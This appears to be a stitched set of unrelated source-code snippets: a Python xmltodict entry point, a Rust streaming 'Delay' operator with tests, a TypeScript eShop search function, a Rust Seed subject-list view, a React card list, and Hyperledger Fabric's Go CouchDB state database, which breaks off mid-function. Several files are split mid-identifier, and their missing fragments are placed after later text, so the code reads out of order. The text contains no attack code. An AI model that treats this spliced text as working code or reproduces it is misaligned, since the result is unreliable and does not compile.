if __name__ == '__main__': # pragma: no cover
import sys
import marshal
try:
stdin = sys.stdin.buffer
stdout = sys.stdout.buffer
except AttributeError:
stdin = sys.stdin
stdout = sys.stdout
(item_depth,) = sys.argv[1:]
item_depth = int(item_depth)
def handle_item(path, item):
marshal.dump((path, item), stdout)
return True
try:
root = parse(stdin,
item_depth=item_depth,
item_callback=handle_item,
dict_constructor=dict)
if item_depth == 0:
handle_item([], root)
except KeyboardInterrupt:
pass | dict_constructor=OrderedDict,
strip_whitespace=True,
namespace_separator=':',
namespaces=None, |
delay.rs | use crate::internal::*;
use crate::pulse::PulsedFact;
use ndarray::*;
#[derive(Debug, new, Clone)]
struct DelayState {
buffer: Tensor,
}
impl DelayState {
pub fn eval_t<T: Datum>(&mut self, op: &Delay, input: Arc<Tensor>) -> TractResult<Arc<Tensor>> {
let axis = Axis(op.axis);
let input = input.to_array_view::<T>()?;
let mut buffer = self.buffer.to_array_view_mut::<T>()?;
let buffered = op.delay + op.overlap;
let input_pulse = input.shape()[op.axis];
let output_pulse = input_pulse + op.overlap;
let mut output_shape: TVec<usize> = input.shape().into();
output_shape[op.axis] = output_pulse;
// build output
let output = if op.delay < input_pulse {
let mut output = unsafe { Tensor::uninitialized::<T>(&*output_shape)? };
let from_input = input_pulse - op.delay;
let from_buffer = output_pulse - from_input;
output
.to_array_view_mut::<T>()?
.slice_axis_mut(axis, Slice::from(..from_buffer))
.assign(&buffer.slice_axis(axis, Slice::from(..from_buffer)));
output
.to_array_view_mut::<T>()?
.slice_axis_mut(axis, Slice::from(from_buffer..))
.assign(&input.slice_axis(axis, Slice::from(..from_input)));
output
} else {
buffer.slice_axis(axis, Slice::from(..output_pulse)).to_owned().into_tensor()
};
// maintain buffer
if buffered < input_pulse {
buffer.assign(&input.slice_axis(axis, Slice::from((input_pulse - buffered)..)));
} else {
let stride = buffer.strides()[op.axis] as usize * input_pulse;
buffer.as_slice_mut().unwrap().rotate_left(stride);
buffer.slice_axis_mut(axis, Slice::from((buffered - input_pulse)..)).assign(&input);
}
let output = output.into_arc_tensor();
Ok(output)
}
}
impl OpState for DelayState {
fn | (
&mut self,
_state: &mut SessionState,
op: &dyn Op,
mut inputs: TVec<Arc<Tensor>>,
) -> TractResult<TVec<Arc<Tensor>>> {
let input = args_1!(inputs);
let op = op.downcast_ref::<Delay>().ok_or("Wrong Op type")?;
Ok(tvec!(dispatch_datum!(Self::eval_t(input.datum_type())(self, op, input))?))
}
}
#[derive(Clone, Debug, PartialEq, Hash)]
pub struct Delay {
datum_type: DatumType,
buffer_shape: TVec<usize>,
axis: usize,
delay: usize,
overlap: usize,
}
tract_linalg::impl_dyn_hash!(Delay);
impl Delay {
pub fn new(input_fact: &PulsedFact, delay: usize, overlap: usize) -> Delay {
let axis = input_fact.axis;
let mut buffer_shape = input_fact.shape.clone();
buffer_shape[axis] = delay + overlap;
Delay { datum_type: input_fact.datum_type, buffer_shape, axis, delay, overlap }
}
}
impl Op for Delay {
fn name(&self) -> Cow<str> {
"Delay".into()
}
fn info(&self) -> TractResult<Vec<String>> {
Ok(vec![
format!("axis: {} delay: {} overlap: {}", self.axis, self.delay, self.overlap),
format!("buffer: {:?} {:?}", self.buffer_shape, self.datum_type),
])
}
canonic!();
op_core_lir_mir!();
impl_op_same_as!();
op_as_typed_op!();
op_as_pulsed_op!();
}
impl StatefullOp for Delay {
fn state(
&self,
_session: &mut SessionState,
_node_id: usize,
) -> TractResult<Option<Box<dyn OpState>>> {
let buffer = unsafe { Tensor::uninitialized_dt(self.datum_type, &*self.buffer_shape)? };
Ok(Some(Box::new(DelayState { buffer })))
}
}
impl TypedOp for Delay {
as_op!();
fn output_facts(&self, inputs: &[&TypedFact]) -> TractResult<TVec<TypedFact>> {
let mut fact = inputs[0].clone();
fact.shape.set_dim(self.axis, fact.shape.dim(self.axis) + self.overlap)?;
Ok(tvec!(fact))
}
fn cost(&self, _inputs: &[&TypedFact]) -> TractResult<TVec<(Cost, TDim)>> {
Ok(tvec!((
Cost::Buffer(self.datum_type),
self.buffer_shape.iter().product::<usize>().to_dim()
)))
}
}
impl PulsedOp for Delay {
fn pulsed_output_facts(&self, inputs: &[&PulsedFact]) -> TractResult<TVec<PulsedFact>> {
let mut fact = inputs[0].clone();
fact.shape[self.axis] += self.overlap;
fact.delay += self.delay + self.overlap;
Ok(tvec!(fact))
}
as_op!();
pulsed_op_to_typed_op!();
}
#[cfg(test)]
mod test {
use super::*;
use crate::*;
fn test_pulse_delay_over(pulse: usize, delay: usize, overlap: usize) {
let mut model = PulsedModel::default();
let fact1 = PulsedFact {
datum_type: u8::datum_type(),
shape: tvec![pulse],
axis: 0,
dim: TDim::s(),
delay: 0,
};
let source = model.add_source("source", fact1.clone()).unwrap();
model.wire_node("delay", Delay::new(&fact1, delay, overlap), &[source]).unwrap();
model.auto_outputs().unwrap();
let plan = SimplePlan::new(model).unwrap();
let mut state = crate::plan::SimpleState::new(plan).unwrap();
for i in 0..5 {
let input: Vec<u8> = (pulse * i..(pulse * (i + 1))).map(|a| a as u8).collect();
let expect: Vec<u8> = (pulse * i..(pulse * (i + 1) + overlap))
.map(|i| i.saturating_sub(delay + overlap) as u8)
.collect();
let output = state.run(tvec!(Tensor::from(arr1(&input)))).unwrap();
let skip = (delay + overlap).saturating_sub(i * pulse).min(pulse + overlap);
assert_eq!(&output[0].as_slice::<u8>().unwrap()[skip..], &expect[skip..]);
}
}
#[test]
fn sub_pulse() {
test_pulse_delay_over(4, 1, 0);
}
#[test]
fn supra_pulse() {
test_pulse_delay_over(4, 5, 0);
}
#[test]
fn sub_pulse_context() {
test_pulse_delay_over(4, 0, 2);
}
#[test]
fn supra_pulse_context() {
test_pulse_delay_over(4, 0, 6);
}
#[test]
fn test_two_delays() {
let pulse = 4;
let mut model = PulsedModel::default();
let fact_0 = PulsedFact {
datum_type: u8::datum_type(),
shape: tvec![pulse],
axis: 0,
dim: TDim::s(),
delay: 0,
};
let source = model.add_source("source", fact_0.clone()).unwrap();
let delay_1 = model.wire_node("delay-1", Delay::new(&fact_0, 2, 0), &[source]).unwrap()[0];
let fact_1 = model.outlet_fact(delay_1).unwrap().clone();
let delay_2 = model.wire_node("delay-1", Delay::new(&fact_1, 2, 0), &[delay_1]).unwrap();
model.set_output_outlets(&delay_2).unwrap();
let plan = SimplePlan::new(model).unwrap();
let mut state = crate::plan::SimpleState::new(plan).unwrap();
for i in 0..5 {
let input: Vec<u8> = (pulse * i..(pulse * (i + 1))).map(|a| a as u8).collect();
let expect: Vec<u8> =
(pulse * i..(pulse * (i + 1))).map(|i| i.saturating_sub(4) as u8).collect();
let skip = 4usize.saturating_sub(i * pulse).min(pulse);
let output = state.run(tvec!(Tensor::from(arr1(&input)))).unwrap();
assert_eq!(&output[0].as_slice::<u8>().unwrap()[skip..], &expect[skip..]);
}
}
}
| eval |
getQueriedGamesAmerica.ts | import fetch from 'node-fetch';
import { stringify } from 'querystring';
import { QUERIED_US_ALGOLIA_KEY, US_ALGOLIA_HEADERS, QUERIED_US_GET_GAMES_URL } from '../utils/constants';
import type { QueriedGameResult, QueriedGamesAmericaOptions, QueriedGameUS } from '../utils/interfaces';
import { EshopError } from '../utils/utils';
/**
* Fetches a subset of games from the American e-shops as based on a given query
* @param query The query to search for
* @param __namedParameters Additional options for the [[getQueriedGamesAmerica]] call. Defaults to `{ hitsPerPage: 200, page: 0 }`
* @returns Promise containing the first `hitsPerPage` games that match your query
* @license Apache-2.0 Favna & Antonio Román
* @copyright 2019
*/
export const getQueriedGamesAmerica = async (
query: string,
{ hitsPerPage = 200, page = 0 }: QueriedGamesAmericaOptions = { hitsPerPage: 200, page: 0 }
): Promise<QueriedGameUS[]> => {
const response = await fetch(QUERIED_US_GET_GAMES_URL, {
method: 'POST',
headers: {
...US_ALGOLIA_HEADERS,
'X-Algolia-API-Key': QUERIED_US_ALGOLIA_KEY
},
body: JSON.stringify({
params: stringify({
hitsPerPage,
page,
query
})
})
});
if (!response.ok) throw new EshopError(`Fetching games for the query "${query} failed"`); | if (!hits.length) throw new EshopError(`No game results for the query "${query}"`);
return hits;
}; |
const { hits }: QueriedGameResult = await response.json();
|
subjects.rs | use uuid::Uuid;
use seed::{prelude::*, *};
use crate::{
Msg,
Model,
models::Kind,
};
fn nazev(n: &str) -> Node<Msg> {
header![
h4![n]
]
}
fn popis(u: &str, p: &str) -> Vec<Node<Msg>> {
vec![
p![
b!["Vyučující: "],
u
],
p![p]
]
}
fn footer(id: Uuid) -> Node<Msg> {
footer![
a![
attrs!{At::Class => "button dark"},
simple_ev(Ev::Click, Msg::SignUp(id)),
"Zapsat se"
]
]
}
fn sub | : Uuid, n: &str, u: &str, p: &str) -> Node<Msg> {
let store = seed::storage::get_storage().unwrap();
let typ: String = store.get_item("typ").unwrap().unwrap_or_default();
section![
attrs!{At::Class => "card"},
style![
St::MarginTop => "1em",
],
nazev(n),
popis(u, p),
match typ.replace('"', "").as_str() {
"student" => footer(id),
_ => br![]
}
]
}
pub(crate) fn view(model: &Model) -> Vec<Node<Msg>> {
vec![
h2!["Předměty"],
section![
attrs!{At::Class => "row"},
section![
attrs!{At::Class => "col"},
h3!["Přírodovědné"],
model.subjects
.iter()
.filter(|x| x.kind == Kind::Science)
.map(|x| subject(x.id, &x.name, &model.teachers.iter().find(|u| x.teacher == u.id).unwrap().name, &x.description))
.collect::<Vec<_>>()
],
section![
attrs!{At::Class => "col"},
h3!["Humanitní"],
model.subjects
.iter()
.filter(|x| x.kind == Kind::Humanity)
.map(|x| subject(x.id, &x.name, &model.teachers.iter().find(|u| x.teacher == u.id).unwrap().name, &x.description))
.collect::<Vec<_>>()
],
section![
attrs!{At::Class => "col"},
h3!["Ostatní"],
model.subjects
.iter()
.filter(|x| x.kind == Kind::Other)
.map(|x| subject(x.id, &x.name, &model.teachers.iter().find(|u| x.teacher == u.id).unwrap().name, &x.description))
.collect::<Vec<_>>()
],
]
]
}
| ject(id |
App.tsx | import React from "react";
import { Link } from "react-router-dom";
import { cards } from "../links";
export default function App() {
return (
<div className="row mt-5">
{cards.map((item: any, index: number) => {
return (
<div className="col-md-4" key={index}>
<div className="card" style={{ width: "18rem" }}>
<div className="card-body">
<h5 className="card-title">{item.title}</h5>
<p className="card-text">{item.text}</p>
<button className="btn btn-primary">
<Link
className="text-white text-decoration-none" | </Link>
</button>
</div>
</div>
</div>
);
})}
</div>
);
} | to={item.link}
>
{item.linkText} |
statecouchdb.go | /*
Copyright IBM Corp. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package statecouchdb
import (
"bytes"
"context"
"encoding/json"
"sort"
"sync"
"github.com/hyperledger/fabric/common/flogging"
"github.com/hyperledger/fabric/common/ledger/dataformat"
"github.com/hyperledger/fabric/common/metrics"
"github.com/hyperledger/fabric/core/ledger"
"github.com/hyperledger/fabric/core/ledger/internal/version"
"github.com/hyperledger/fabric/core/ledger/kvledger/txmgmt/statedb"
"github.com/pkg/errors"
)
var logger = flogging.MustGetLogger("statecouchdb")
const (
// savepointDocID is used as a key for maintaining savepoint (maintained in metadatadb for a channel)
savepointDocID = "statedb_savepoint"
// channelMetadataDocID is used as a key to store the channel metadata for a channel (maintained in the channel's metadatadb).
// Due to CouchDB's length restriction on db names, channel names and namepsaces may be truncated in db names.
// The metadata is used for dropping channel-specific databases and snapshot support.
channelMetadataDocID = "channel_metadata"
// fabricInternalDBName is used to create a db in couch that would be used for internal data such as the version of the data format
// a double underscore ensures that the dbname does not clash with the dbnames created for the chaincodes
fabricInternalDBName = "fabric__internal"
// dataformatVersionDocID is used as a key for maintaining version of the data format (maintained in fabric internal db)
dataformatVersionDocID = "dataformatVersion"
fullScanIteratorValueFormat = byte(1)
)
// VersionedDBProvider implements interface VersionedDBProvider
type VersionedDBProvider struct {
couchInstance *couchInstance
databases map[string]*VersionedDB
mux sync.Mutex
openCounts uint64
redoLoggerProvider *redoLoggerProvider
cache *cache
}
// NewVersionedDBProvider instantiates VersionedDBProvider
func NewVersionedDBProvider(config *ledger.CouchDBConfig, metricsProvider metrics.Provider, sysNamespaces []string) (*VersionedDBProvider, error) {
logger.Debugf("constructing CouchDB VersionedDBProvider")
couchInstance, err := createCouchInstance(config, metricsProvider)
if err != nil {
return nil, err
}
if err := checkExpectedDataformatVersion(couchInstance); err != nil {
return nil, err
}
p, err := newRedoLoggerProvider(config.RedoLogPath)
if err != nil {
return nil, err
}
cache := newCache(config.UserCacheSizeMBs, sysNamespaces)
return &VersionedDBProvider{
couchInstance: couchInstance,
databases: make(map[string]*VersionedDB),
mux: sync.Mutex{},
openCounts: 0,
redoLoggerProvider: p,
cache: cache,
},
nil
}
func checkExpectedDataformatVersion(couchInstance *couchInstance) error {
databasesToIgnore := []string{fabricInternalDBName}
isEmpty, err := couchInstance.isEmpty(databasesToIgnore)
if err != nil {
return err
}
if isEmpty {
logger.Debugf("couch instance is empty. Setting dataformat version to %s", dataformat.CurrentFormat)
return writeDataFormatVersion(couchInstance, dataformat.CurrentFormat)
}
dataformatVersion, err := readDataformatVersion(couchInstance)
if err != nil {
return err
}
if dataformatVersion != dataformat.CurrentFormat {
return &dataformat.ErrFormatMismatch{
DBInfo: "CouchDB for state database",
ExpectedFormat: dataformat.CurrentFormat,
Format: dataformatVersion,
}
}
return nil
}
func readDataformatVersion(couchInstance *couchInstance) (string, error) {
db, err := createCouchDatabase(couchInstance, fabricInternalDBName)
if err != nil {
return "", err
}
doc, _, err := db.readDoc(dataformatVersionDocID)
logger.Debugf("dataformatVersionDoc = %s", doc)
if err != nil || doc == nil {
return "", err
}
return decodeDataformatInfo(doc)
}
func writeDataFormatVersion(couchInstance *couchInstance, dataformatVersion string) error {
db, err := createCouchDatabase(couchInstance, fabricInternalDBName)
if err != nil {
return err
}
doc, err := encodeDataformatInfo(dataformatVersion)
if err != nil {
return err
}
if _, err := db.saveDoc(dataformatVersionDocID, "", doc); err != nil {
return err
}
dbResponse, err := db.ensureFullCommit()
if err != nil {
return err
}
if !dbResponse.Ok {
logger.Errorf("failed to perform full commit while writing dataformat version")
return errors.New("failed to perform full commit while writing dataformat version")
}
return nil
}
// GetDBHandle gets the handle to a named database
func (provider *VersionedDBProvider) GetDBHandle(dbName string) (statedb.VersionedDB, error) {
provider.mux.Lock()
defer provider.mux.Unlock()
vdb := provider.databases[dbName]
if vdb == nil {
var err error
vdb, err = newVersionedDB(
provider.couchInstance,
provider.redoLoggerProvider.newRedoLogger(dbName),
dbName,
provider.cache,
)
if err != nil {
return nil, err
}
provider.databases[dbName] = vdb
}
return vdb, nil
}
// Close closes the underlying db instance
func (provider *VersionedDBProvider) Close() {
// No close needed on Couch
provider.redoLoggerProvider.close()
}
// HealthCheck checks to see if the couch instance of the peer is healthy
func (provider *VersionedDBProvider) HealthCheck(ctx context.Context) error {
return provider.couchInstance.healthCheck(ctx)
}
// VersionedDB implements VersionedDB interface
type VersionedDB struct {
couchInstance *couchInstance
metadataDB *couchDatabase // A database per channel to store metadata such as savepoint.
chainName string // The name of the chain/channel.
namespaceDBs map[string]*couchDatabase // One database per namespace.
channelMetadata *channelMetadata // Store channel name and namespaceDBInfo
committedDataCache *versionsCache // Used as a local cache during bulk processing of a block.
verCacheLock sync.RWMutex
mux sync.RWMutex
redoLogger *redoLogger
cache *cache
}
// newVersionedDB constructs an instance of VersionedDB
func newVersionedDB(couchInstance *couchInstance, redoLogger *redoLogger, dbName string, cache *cache) (*VersionedDB, error) {
// CreateCouchDatabase creates a CouchDB database object, as well as the underlying database if it does not exist
chainName := dbName
dbName = constructMetadataDBName(dbName)
metadataDB, err := createCouchDatabase(couchInstance, dbName)
if err != nil {
return nil, err
}
namespaceDBMap := make(map[string]*couchDatabase)
vdb := &VersionedDB{
couchInstance: couchInstance,
metadataDB: metadataDB,
chainName: chainName,
namespaceDBs: namespaceDBMap,
committedDataCache: newVersionCache(),
redoLogger: redoLogger,
cache: cache,
}
vdb.channelMetadata, err = vdb.readChannelMetadata()
if err != nil {
return nil, err
}
if vdb.channelMetadata == nil {
vdb.channelMetadata = &channelMetadata{
ChannelName: chainName,
NamespaceDBsInfo: make(map[string]*namespaceDBInfo),
}
if err = vdb.writeChannelMetadata(); err != nil {
return nil, err
}
}
logger.Debugf("chain [%s]: checking for redolog record", chainName)
redologRecord, err := redoLogger.load()
if err != nil {
return nil, err
}
savepoint, err := vdb.GetLatestSavePoint()
if err != nil {
return nil, err
}
// in normal circumstances, redolog is expected to be either equal to the last block
// committed to the statedb or one ahead (in the event of a crash). However, either of
// these or both could be nil on first time start (fresh start/rebuild)
if redologRecord == nil || savepoint == nil {
logger.Debugf("chain [%s]: No redo-record or save point present", chainName)
return vdb, nil
}
logger.Debugf("chain [%s]: save point = %#v, version of redolog record = %#v",
chainName, savepoint, redologRecord.Version)
if redologRecord.Version.BlockNum-savepoint.BlockNum == 1 {
logger.Debugf("chain [%s]: Re-applying last batch", chainName)
if err := vdb.applyUpdates(redologRecord.UpdateBatch, redologRecord.Version); err != nil {
return nil, err
}
}
return vdb, nil
}
// getNamespaceDBHandle gets the handle to a named chaincode database
func (vdb *VersionedDB) getNamespaceDBHandle(namespace string) (*couchDatabase, error) {
vdb.mux.RLock()
db := vdb.namespaceDBs[namespace]
vdb.mux.RUnlock()
if db != nil {
return db, nil
}
namespaceDBName := constructNamespaceDBName(vdb.chainName, namespace)
vdb.mux.Lock()
defer vdb.mux.Unlock()
db = vdb.namespaceDBs[namespace]
if db == nil {
var err error
if _, ok := vdb.channelMetadata.NamespaceDBsInfo[namespace]; !ok {
logger.Debugf("[%s] add namespaceDBInfo for namespace %s", vdb.chainName, namespace)
vdb.channelMetadata.NamespaceDBsInfo[namespace] = &namespaceDBInfo{
Namespace: namespace,
DBName: namespaceDBName,
}
if err = vdb.writeChannelMetadata(); err != nil {
return nil, err
}
}
db, err = createCouchDatabase(vdb.couchInstance, namespaceDBName)
if err != nil {
return nil, err
}
vdb.namespaceDBs[namespace] = db
}
return db, nil
}
// ProcessIndexesForChaincodeDeploy creates indexes for a specified namespace
func (vdb *VersionedDB) ProcessIndexesForChaincodeDeploy(namespace string, indexFilesData map[string][]byte) error {
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return err
}
// We need to satisfy two requirements while processing the index files.
// R1: all valid indexes should be processed.
// R2: the order of index creation must be the same in all peers. For example, if user
// passes two index files with the same index name but different index fields and we
// process these files in different orders in different peers, each peer would
// have different indexes (as one index definion could replace another if the index names
// are the same).
// To satisfy R1, we log the error and continue to process the next index file.
// To satisfy R2, we sort the indexFilesData map based on the filenames and process
// each index as per the sorted order.
var indexFilesName []string
for fileName := range indexFilesData {
indexFilesName = append(indexFilesName, fileName)
}
sort.Strings(indexFilesName)
for _, fileName := range indexFilesName {
_, err = db.createIndex(string(indexFilesData[fileName]))
switch {
case err != nil:
logger.Errorf("error creating index from file [%s] for chaincode [%s] on channel [%s]: %+v",
fileName, namespace, vdb.chainName, err)
default:
logger.Infof("successfully submitted index creation request present in the file [%s] for chaincode [%s] on channel [%s]",
fileName, namespace, vdb.chainName)
}
}
return nil
}
// GetDBType returns the hosted stateDB
func (vdb *VersionedDB) GetDBType() string {
return "couchdb"
}
// LoadCommittedVersions populates committedVersions and revisionNumbers into cache.
// A bulk retrieve from couchdb is used to populate the cache.
// committedVersions cache will be used for state validation of readsets
// revisionNumbers cache will be used during commit phase for couchdb bulk updates
func (vdb *VersionedDB) LoadCommittedVersions(keys []*statedb.CompositeKey) error {
missingKeys := map[string][]string{}
committedDataCache := newVersionCache()
for _, compositeKey := range keys {
ns, key := compositeKey.Namespace, compositeKey.Key
committedDataCache.setVerAndRev(ns, key, nil, "")
logger.Debugf("Load into version cache: %s~%s", ns, key)
if !vdb.cache.enabled(ns) {
missingKeys[ns] = append(missingKeys[ns], key)
continue
}
cv, err := vdb.cache.getState(vdb.chainName, ns, key)
if err != nil {
return err
}
if cv == nil {
missingKeys[ns] = append(missingKeys[ns], key)
continue
}
vv, err := constructVersionedValue(cv)
if err != nil {
return err
}
rev := string(cv.AdditionalInfo)
committedDataCache.setVerAndRev(ns, key, vv.Version, rev)
}
nsMetadataMap, err := vdb.retrieveMetadata(missingKeys)
logger.Debugf("missingKeys=%s", missingKeys)
logger.Debugf("nsMetadataMap=%s", nsMetadataMap)
if err != nil {
return err
}
for ns, nsMetadata := range nsMetadataMap {
for _, keyMetadata := range nsMetadata {
// TODO - why would version be ever zero if loaded from db?
if len(keyMetadata.Version) != 0 {
version, _, err := decodeVersionAndMetadata(keyMetadata.Version)
if err != nil {
return err
}
committedDataCache.setVerAndRev(ns, keyMetadata.ID, version, keyMetadata.Rev)
}
}
}
vdb.verCacheLock.Lock()
defer vdb.verCacheLock.Unlock()
vdb.committedDataCache = committedDataCache
return nil
}
// GetVersion implements method in VersionedDB interface
func (vdb *VersionedDB) GetVersion(namespace string, key string) (*version.Height, error) {
version, keyFound := vdb.GetCachedVersion(namespace, key)
if !keyFound {
// This if block get executed only during simulation because during commit
// we always call `LoadCommittedVersions` before calling `GetVersion`
vv, err := vdb.GetState(namespace, key)
if err != nil || vv == nil {
return nil, err
}
version = vv.Version
}
return version, nil
}
// GetCachedVersion returns version from cache. `LoadCommittedVersions` function populates the cache
func (vdb *VersionedDB) GetCachedVersion(namespace string, key string) (*version.Height, bool) {
logger.Debugf("Retrieving cached version: %s~%s", key, namespace)
vdb.verCacheLock.RLock()
defer vdb.verCacheLock.RUnlock()
return vdb.committedDataCache.getVersion(namespace, key)
}
// ValidateKeyValue implements method in VersionedDB interface
func (vdb *VersionedDB) ValidateKeyValue(key string, value []byte) error {
err := validateKey(key)
if err != nil {
return err
}
return validateValue(value)
}
// BytesKeySupported implements method in VersionvdbedDB interface
func (vdb *VersionedDB) BytesKeySupported() bool {
return false
}
// GetState implements method in VersionedDB interface
func (vdb *VersionedDB) GetState(namespace string, key string) (*statedb.VersionedValue, error) {
logger.Debugf("GetState(). ns=%s, key=%s", namespace, key)
// (1) read the KV from the cache if available
cacheEnabled := vdb.cache.enabled(namespace)
if cacheEnabled {
cv, err := vdb.cache.getState(vdb.chainName, namespace, key)
if err != nil {
return nil, err
}
if cv != nil {
vv, err := constructVersionedValue(cv)
if err != nil {
return nil, err
}
return vv, nil
}
}
// (2) read from the database if cache miss occurs
kv, err := vdb.readFromDB(namespace, key)
if err != nil {
return nil, err
}
if kv == nil {
return nil, nil
}
// (3) if the value is not nil, store in the cache
if cacheEnabled {
cacheValue := constructCacheValue(kv.VersionedValue, kv.revision)
if err := vdb.cache.putState(vdb.chainName, namespace, key, cacheValue); err != nil {
return nil, err
}
}
return kv.VersionedValue, nil
}
func (vdb *VersionedDB) readFromDB(namespace, key string) (*keyValue, error) {
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return nil, err
}
couchDoc, _, err := db.readDoc(key)
if err != nil {
return nil, err
}
if couchDoc == nil {
return nil, nil
}
kv, err := couchDocToKeyValue(couchDoc)
if err != nil {
return nil, err
}
return kv, nil
}
// GetStateMultipleKeys implements method in VersionedDB interface
func (vdb *VersionedDB) GetStateMultipleKeys(namespace string, keys []string) ([]*statedb.VersionedValue, error) {
vals := make([]*statedb.VersionedValue, len(keys))
for i, key := range keys {
val, err := vdb.GetState(namespace, key)
if err != nil {
return nil, err
}
vals[i] = val
}
return vals, nil
}
// GetStateRangeScanIterator implements method in VersionedDB interface
// startKey is inclusive
// endKey is exclusive
func (vdb *VersionedDB) GetStateRangeScanIterator(namespace string, startKey string, endKey string) (statedb.ResultsIterator, error) {
return vdb.GetStateRangeScanIteratorWithPagination(namespace, startKey, endKey, 0)
}
// GetStateRangeScanIteratorWithPagination implements method in VersionedDB interface
// startKey is inclusive
// endKey is exclusive
// pageSize limits the number of results returned
func (vdb *VersionedDB) GetStateRangeScanIteratorWithPagination(namespace string, startKey string, endKey string, pageSize int32) (statedb.QueryResultsIterator, error) {
logger.Debugf("Entering GetStateRangeScanIteratorWithPagination namespace: %s startKey: %s endKey: %s pageSize: %d", namespace, startKey, endKey, pageSize)
internalQueryLimit := vdb.couchInstance.internalQueryLimit()
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return nil, err
}
return newQueryScanner(namespace, db, "", internalQueryLimit, pageSize, "", startKey, endKey)
}
func (scanner *queryScanner) getNextStateRangeScanResults() error {
queryLimit := scanner.queryDefinition.internalQueryLimit
if scanner.paginationInfo.requestedLimit > 0 {
moreResultsNeeded := scanner.paginationInfo.requestedLimit - scanner.resultsInfo.totalRecordsReturned
if moreResultsNeeded < scanner.queryDefinition.internalQueryLimit {
queryLimit = moreResultsNeeded
}
}
queryResult, nextStartKey, err := rangeScanFilterCouchInternalDocs(scanner.db,
scanner.queryDefinition.startKey, scanner.queryDefinition.endKey, queryLimit)
if err != nil |
scanner.resultsInfo.results = queryResult
scanner.paginationInfo.cursor = 0
if scanner.queryDefinition.endKey == nextStartKey {
// as we always set inclusive_end=false to match the behavior of
// goleveldb iterator, it is safe to mark the scanner as exhausted
scanner.exhausted = true
// we still need to update the startKey as it is returned as bookmark
}
scanner.queryDefinition.startKey = nextStartKey
return nil
}
func rangeScanFilterCouchInternalDocs(db *couchDatabase,
startKey, endKey string, queryLimit int32,
) ([]*queryResult, string, error) {
var finalResults []*queryResult
var finalNextStartKey string
for {
results, nextStartKey, err := db.readDocRange(startKey, endKey, queryLimit)
if err != nil {
logger.Debugf("Error calling ReadDocRange(): %s\n", err.Error())
return nil, "", err
}
var filteredResults []*queryResult
for _, doc := range results {
if !isCouchInternalKey(doc.id) {
filteredResults = append(filteredResults, doc)
}
}
finalResults = append(finalResults, filteredResults...)
finalNextStartKey = nextStartKey
queryLimit = int32(len(results) - len(filteredResults))
if queryLimit == 0 || finalNextStartKey == "" {
break
}
startKey = finalNextStartKey
}
var err error
for i := 0; isCouchInternalKey(finalNextStartKey); i++ {
_, finalNextStartKey, err = db.readDocRange(finalNextStartKey, endKey, 1)
logger.Debugf("i=%d, finalNextStartKey=%s", i, finalNextStartKey)
if err != nil {
return nil, "", err
}
}
return finalResults, finalNextStartKey, nil
}
func isCouchInternalKey(key string) bool {
return len(key) != 0 && key[0] == '_'
}
// ExecuteQuery implements method in VersionedDB interface
func (vdb *VersionedDB) ExecuteQuery(namespace, query string) (statedb.ResultsIterator, error) {
queryResult, err := vdb.ExecuteQueryWithPagination(namespace, query, "", 0)
if err != nil {
return nil, err
}
return queryResult, nil
}
// ExecuteQueryWithPagination implements method in VersionedDB interface
func (vdb *VersionedDB) ExecuteQueryWithPagination(namespace, query, bookmark string, pageSize int32) (statedb.QueryResultsIterator, error) {
logger.Debugf("Entering ExecuteQueryWithPagination namespace: %s, query: %s, bookmark: %s, pageSize: %d", namespace, query, bookmark, pageSize)
internalQueryLimit := vdb.couchInstance.internalQueryLimit()
queryString, err := applyAdditionalQueryOptions(query, internalQueryLimit, bookmark)
if err != nil {
logger.Errorf("Error calling applyAdditionalQueryOptions(): %s", err.Error())
return nil, err
}
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return nil, err
}
return newQueryScanner(namespace, db, queryString, internalQueryLimit, pageSize, bookmark, "", "")
}
// executeQueryWithBookmark executes a "paging" query with a bookmark, this method allows a
// paged query without returning a new query iterator
func (scanner *queryScanner) executeQueryWithBookmark() error {
queryLimit := scanner.queryDefinition.internalQueryLimit
if scanner.paginationInfo.requestedLimit > 0 {
if scanner.paginationInfo.requestedLimit-scanner.resultsInfo.totalRecordsReturned < scanner.queryDefinition.internalQueryLimit {
queryLimit = scanner.paginationInfo.requestedLimit - scanner.resultsInfo.totalRecordsReturned
}
}
queryString, err := applyAdditionalQueryOptions(scanner.queryDefinition.query,
queryLimit, scanner.paginationInfo.bookmark)
if err != nil {
logger.Debugf("Error calling applyAdditionalQueryOptions(): %s\n", err.Error())
return err
}
queryResult, bookmark, err := scanner.db.queryDocuments(queryString)
if err != nil {
logger.Debugf("Error calling QueryDocuments(): %s\n", err.Error())
return err
}
scanner.resultsInfo.results = queryResult
scanner.paginationInfo.bookmark = bookmark
scanner.paginationInfo.cursor = 0
return nil
}
// ApplyUpdates implements method in VersionedDB interface
func (vdb *VersionedDB) ApplyUpdates(updates *statedb.UpdateBatch, height *version.Height) error {
if height != nil && updates.ContainsPostOrderWrites {
// height is passed nil when committing missing private data for previously committed blocks
r := &redoRecord{
UpdateBatch: updates,
Version: height,
}
if err := vdb.redoLogger.persist(r); err != nil {
return err
}
}
return vdb.applyUpdates(updates, height)
}
func (vdb *VersionedDB) applyUpdates(updates *statedb.UpdateBatch, height *version.Height) error {
// TODO a note about https://jira.hyperledger.org/browse/FAB-8622
// The write lock is needed only for the stage 2.
// stage 1 - buildCommitters builds committers per namespace (per DB). Each committer transforms the
// given batch in the form of underlying db and keep it in memory.
committers, err := vdb.buildCommitters(updates)
if err != nil {
return err
}
// stage 2 -- executeCommitter executes each committer to push the changes to the DB
if err = vdb.executeCommitter(committers); err != nil {
return err
}
// Stgae 3 - postCommitProcessing - flush and record savepoint.
namespaces := updates.GetUpdatedNamespaces()
if err := vdb.postCommitProcessing(committers, namespaces, height); err != nil {
return err
}
return nil
}
func (vdb *VersionedDB) postCommitProcessing(committers []*committer, namespaces []string, height *version.Height) error {
var wg sync.WaitGroup
wg.Add(1)
errChan := make(chan error, 1)
defer close(errChan)
go func() {
defer wg.Done()
cacheUpdates := make(cacheUpdates)
for _, c := range committers {
if !c.cacheEnabled {
continue
}
cacheUpdates.add(c.namespace, c.cacheKVs)
}
if len(cacheUpdates) == 0 {
return
}
// update the cache
if err := vdb.cache.UpdateStates(vdb.chainName, cacheUpdates); err != nil {
vdb.cache.Reset()
errChan <- err
}
}()
// Record a savepoint at a given height
